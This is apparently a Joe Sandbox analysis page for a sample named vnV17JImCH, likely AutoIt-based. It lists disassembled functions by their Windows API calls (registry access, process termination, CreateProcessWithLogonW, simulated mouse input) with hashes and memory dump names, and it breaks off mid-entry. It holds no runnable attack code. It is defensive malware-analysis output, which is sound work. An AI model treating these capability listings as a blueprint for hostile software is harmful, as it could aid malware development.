Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 51945d54c3f8c0ccc4411b98a6fdda64bcd9e1a3578c2feb254a5296041c596c
Instruction ID: 0221c28dbd5db3d2d45fe888fa121b4fd20ca7f5a3eca19621ce8479426466c0
Opcode Fuzzy Hash: 51945d54c3f8c0ccc4411b98a6fdda64bcd9e1a3578c2feb254a5296041c596c
Instruction Fuzzy Hash: 76618B3190065A9BCF05EF60CC81FFF37A5AF4A318F044519FC55AB192DB3AA916EB50

Function 00F201E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA7DE1: _memmove.LIBCMT ref: 00EA7E22

Part of subcall function 00F20E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F1FDAD,?,?), ref: 00F20E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F202BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F202FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F20320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F20349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F2038C
RegCloseKey.ADVAPI32(00000000), ref: 00F20399

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: b5070875eb136ecb8b156f393e2d78a870582f6d175203e59b63d8c48618e1a3
Instruction ID: b7d47fd55b7aba4e23887fac9686e9a5d56a82cb3f95ffa0eb36e681dc4b8519
Opcode Fuzzy Hash: b5070875eb136ecb8b156f393e2d78a870582f6d175203e59b63d8c48618e1a3
Instruction Fuzzy Hash: 9D516832508204AFC714EF64D885EAFBBE9FF89310F04492DF4959B2A2DB31E905DB52

Function 00F25799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00F257FB
GetMenuItemCount.USER32(00000000), ref: 00F25832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F2585A
GetMenuItemID.USER32(?,?), ref: 00F258C9
GetSubMenu.USER32(?,?), ref: 00F258D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00F25928

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 70abd8b3f1b7253e064fd97317b8c0044a42af8dd245490dc82c8de05afff885
Instruction ID: e4bb7f5e731567d4c273aa2e130029c36898fb76a6c5fa584b6bc3fe203e365d
Opcode Fuzzy Hash: 70abd8b3f1b7253e064fd97317b8c0044a42af8dd245490dc82c8de05afff885
Instruction Fuzzy Hash: 4A513B35E00629EFCF15EF64D845AAEBBB4EF49720F144069E801BB351CB75AE41AB90

Function 00EFEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00EFEF06
VariantClear.OLEAUT32(00000013), ref: 00EFEF78
VariantClear.OLEAUT32(00000000), ref: 00EFEFD3
_memmove.LIBCMT ref: 00EFEFFD
VariantClear.OLEAUT32(?), ref: 00EFF04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00EFF078

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 61e8185a5b878a12484bb6ef23e242fa1bf9f80b1601e68e993b420f80ed9d0d
Instruction ID: 32ddd40dc84526bb4593de66ac6f760c87bf30b73288084e9576225b65d70833
Opcode Fuzzy Hash: 61e8185a5b878a12484bb6ef23e242fa1bf9f80b1601e68e993b420f80ed9d0d
Instruction Fuzzy Hash: 1B516CB5A00209DFDB14DF58C880AAAB7B8FF4C314B158569EE59EB301E735E911CBA0

Function 00F0220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F02258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F022A3
IsMenu.USER32(00000000), ref: 00F022C3
CreatePopupMenu.USER32 ref: 00F022F7
GetMenuItemCount.USER32(000000FF), ref: 00F02355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F02386

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 81bf6a826010fc29e90808626695766f728c7eceed25af2d25ae8a4f6d977100
Instruction ID: e147ca64174697a14493c9ceb32b170ae94151f375082285d9967395f60a450f
Opcode Fuzzy Hash: 81bf6a826010fc29e90808626695766f728c7eceed25af2d25ae8a4f6d977100
Instruction Fuzzy Hash: 5551CD30A00209EBDF61CF68C98CBAEBBF5BF05324F144169E855A72D0D7788905FB61

Function 00EA1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00EA2612: GetWindowLongW.USER32(?,000000EB), ref: 00EA2623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00EA179A
GetWindowRect.USER32(?,?), ref: 00EA17FE
ScreenToClient.USER32(?,?), ref: 00EA181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00EA182C
EndPaint.USER32(?,?), ref: 00EA1876

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 8304e484fd378125080d0edcc55fcda122d18ac70a4d00d5885331f11406919d
Instruction ID: 4738914a2812f8a467a18ace277cfea49d5cda27d618736401bf481ca17e412f
Opcode Fuzzy Hash: 8304e484fd378125080d0edcc55fcda122d18ac70a4d00d5885331f11406919d
Instruction Fuzzy Hash: 31419330504704DFD710DF24DC84FBA7BF8EB4A724F144669F5A4AB2A1D770A845EB62

Function 00F2B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00F657B0,00000000,016B5DA8,?,?,00F657B0,?,00F2B5A8,?,?), ref: 00F2B712
EnableWindow.USER32(00000000,00000000), ref: 00F2B736
ShowWindow.USER32(00F657B0,00000000,016B5DA8,?,?,00F657B0,?,00F2B5A8,?,?), ref: 00F2B796
ShowWindow.USER32(00000000,00000004,?,00F2B5A8,?,?), ref: 00F2B7A8
EnableWindow.USER32(00000000,00000001), ref: 00F2B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F2B7EF

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 3ab4d4dda80fffd482a54a2a0ba5568644427df156f31cca99f7dfc4e3564961
Instruction ID: d37a41ac9e33a6e1fff01ea6c28ad2f1126e7fc3232c0acad15dde2a07f98da9
Opcode Fuzzy Hash: 3ab4d4dda80fffd482a54a2a0ba5568644427df156f31cca99f7dfc4e3564961
Instruction Fuzzy Hash: 0B41A134A00255AFDB22CF24E499B957BF0FF45320F1841B9FD488F6A2C731A856EB50

Function 00F1709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00F14E41,?,?,00000000,00000001), ref: 00F170AC

Part of subcall function 00F139A0: GetWindowRect.USER32(?,?), ref: 00F139B3

GetDesktopWindow.USER32 ref: 00F170D6
GetWindowRect.USER32(00000000), ref: 00F170DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F1710F

Part of subcall function 00F05244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F052BC

GetCursorPos.USER32(?), ref: 00F1713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F17199

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 30d4bab9e4ca9f1359c88642fe2e3367de2021b4916b7fd5d018269113b4456f
Instruction ID: dddb2c2134cfe8ce426bf20fdcac04d9ca6550fb4bdf76972b50cc98868c1daf
Opcode Fuzzy Hash: 30d4bab9e4ca9f1359c88642fe2e3367de2021b4916b7fd5d018269113b4456f
Instruction Fuzzy Hash: E931B472505309ABD720EF14CC49F9BB7A9FF88314F000929F589A7191C774EA49DB92

Function 00EF8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EF80C0
Part of subcall function 00EF80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EF80CA
Part of subcall function 00EF80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EF80D9
Part of subcall function 00EF80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EF80E0
Part of subcall function 00EF80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EF80F6

GetLengthSid.ADVAPI32(?,00000000,00EF842F), ref: 00EF88CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00EF88D6
HeapAlloc.KERNEL32(00000000), ref: 00EF88DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 00EF88F6
GetProcessHeap.KERNEL32(00000000,00000000,00EF842F), ref: 00EF890A
HeapFree.KERNEL32(00000000), ref: 00EF8911

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: a5039935af407cd2d91457b5d508877ce79cf329ba7a426e170885ce9553963e
Instruction ID: 0a6b777f88b512089e5e57768fe81d3b4657e782665594f58bf88c5730cef40b
Opcode Fuzzy Hash: a5039935af407cd2d91457b5d508877ce79cf329ba7a426e170885ce9553963e
Instruction Fuzzy Hash: 0211DF3151120CFFDB208FA4CE0ABBE7BB8EB80315F504028E949A3111CB329915DB61

Function 00EF85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00EF85E2
OpenProcessToken.ADVAPI32(00000000), ref: 00EF85E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00EF85F8
CloseHandle.KERNEL32(00000004), ref: 00EF8603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EF8632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00EF8646

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 041a0b4ae2c19b8e3ca536ec04950b4ae6eb72b20739c2616b60986801db454f
Instruction ID: ee28abfa74f923ebfd61cd7bf11dd69d244896d97d3c42f7738be87bc5384c3f
Opcode Fuzzy Hash: 041a0b4ae2c19b8e3ca536ec04950b4ae6eb72b20739c2616b60986801db454f
Instruction Fuzzy Hash: CD11477250024DABDF11CFA4DD49FEA7BB9EB08708F044065FE04A2160C6728D65AB60

Function 00EFB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00EFB7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 00EFB7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EFB7CD
ReleaseDC.USER32(00000000,00000000), ref: 00EFB7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00EFB7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 00EFB7FE

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 3ddc7aa8b513a886e1a5995431326722ffe38a307d05f3700d1b2ae998f1e209
Instruction ID: cdefe6e2629e1490f83f1373a28c746a05e41c0643a07e2f14fa10a48097dd5a
Opcode Fuzzy Hash: 3ddc7aa8b513a886e1a5995431326722ffe38a307d05f3700d1b2ae998f1e209
Instruction Fuzzy Hash: 56018475E0020DBBEB10ABA6DD45E5EBFB8EB48351F004076FA04E7291D6309C11DF90

Function 00EC0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EC0193
MapVirtualKeyW.USER32(00000010,00000000), ref: 00EC019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EC01A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EC01B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00EC01B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00EC01C1

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 9deea4011f739d4143985fad328eb295970122d7ca335b633a5affed5c8a9160
Instruction ID: 7969da629bb0a6ae369634138289467189d1f18bf6ee0d89ef833170e8429339
Opcode Fuzzy Hash: 9deea4011f739d4143985fad328eb295970122d7ca335b633a5affed5c8a9160
Instruction Fuzzy Hash: 32016CB09027597DE3008F5A8C85B52FFB8FF19354F00411BA15C47941C7F5A868CBE5

Function 00F053E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F053F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F0540F
GetWindowThreadProcessId.USER32(?,?), ref: 00F0541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F0542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F05437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F0543E

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 0b2979714afbc1c0fb693f14ad49f9fdd7fdd26771ef901ae4bfe8df4e21d2f0
Instruction ID: a62988dbc803937d6ea4e88cd138b9153e80a21516ef2ef495cc7a6c771a34f5
Opcode Fuzzy Hash: 0b2979714afbc1c0fb693f14ad49f9fdd7fdd26771ef901ae4bfe8df4e21d2f0
Instruction Fuzzy Hash: 09F06D3265115CBBE7315BA29C0EEEB7E7CEBCAB11F000179FA04D109096A01A06AAB5

Function 00F07230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00F07243
EnterCriticalSection.KERNEL32(?,?,00EB0EE4,?,?), ref: 00F07254
TerminateThread.KERNEL32(00000000,000001F6,?,00EB0EE4,?,?), ref: 00F07261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00EB0EE4,?,?), ref: 00F0726E

Part of subcall function 00F06C35: CloseHandle.KERNEL32(00000000,?,00F0727B,?,00EB0EE4,?,?), ref: 00F06C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00F07281
LeaveCriticalSection.KERNEL32(?,?,00EB0EE4,?,?), ref: 00F07288

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: ffc2f4afac1d59da66a1fd3ecf2730f451f653df8c12b238f3b45f949aa139a6
Instruction ID: 756e48621760711493f23421e079c0d46c80a94d9a141983bba18be99b1042cd
Opcode Fuzzy Hash: ffc2f4afac1d59da66a1fd3ecf2730f451f653df8c12b238f3b45f949aa139a6
Instruction Fuzzy Hash: 0AF0BE36851216EBE7612B24EE4CDEA7739EF06312B000131F103900E0CB761816EB50

Function 00EF8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EF899D
UnloadUserProfile.USERENV(?,?), ref: 00EF89A9
CloseHandle.KERNEL32(?), ref: 00EF89B2
CloseHandle.KERNEL32(?), ref: 00EF89BA
GetProcessHeap.KERNEL32(00000000,?), ref: 00EF89C3
HeapFree.KERNEL32(00000000), ref: 00EF89CA

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: aceecb122acdc633c70f121b36b15eeb831631d8f126c21e84af43ba452f5ad8
Instruction ID: c04601e063a4a1f35b3b2d5978abcad581684aa7a75491607d730203a7c30928
Opcode Fuzzy Hash: aceecb122acdc633c70f121b36b15eeb831631d8f126c21e84af43ba452f5ad8
Instruction Fuzzy Hash: 55E0C236014009FBDA115FE1ED0C91ABB79FB89322B508230F21981070CB32983AEB50

Function 00F185ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F18613
CharUpperBuffW.USER32(?,?), ref: 00F18722
VariantClear.OLEAUT32(?), ref: 00F1889A

Part of subcall function 00F07562: VariantInit.OLEAUT32(00000000), ref: 00F075A2
Part of subcall function 00F07562: VariantCopy.OLEAUT32(00000000,?), ref: 00F075AB
Part of subcall function 00F07562: VariantClear.OLEAUT32(00000000), ref: 00F075B7

Strings

AUTOIT.ERROR, xrefs: 00F18728
Incorrect Parameter format, xrefs: 00F1864B, 00F1880D

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 521973927a97140c95d0fb7ac9e6b640ffdd7e7380c9452e5f7d4f9019a2913b
Instruction ID: f710ea33737553c715793a6bb20d3bb4b2e25561edfe4fa1b9e73280937ba45d
Opcode Fuzzy Hash: 521973927a97140c95d0fb7ac9e6b640ffdd7e7380c9452e5f7d4f9019a2913b
Instruction Fuzzy Hash: 70919C71A043019FC710DF24C58099BBBE4EF89354F14896EF89A9B362DB31ED46DB92

Function 00F02A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

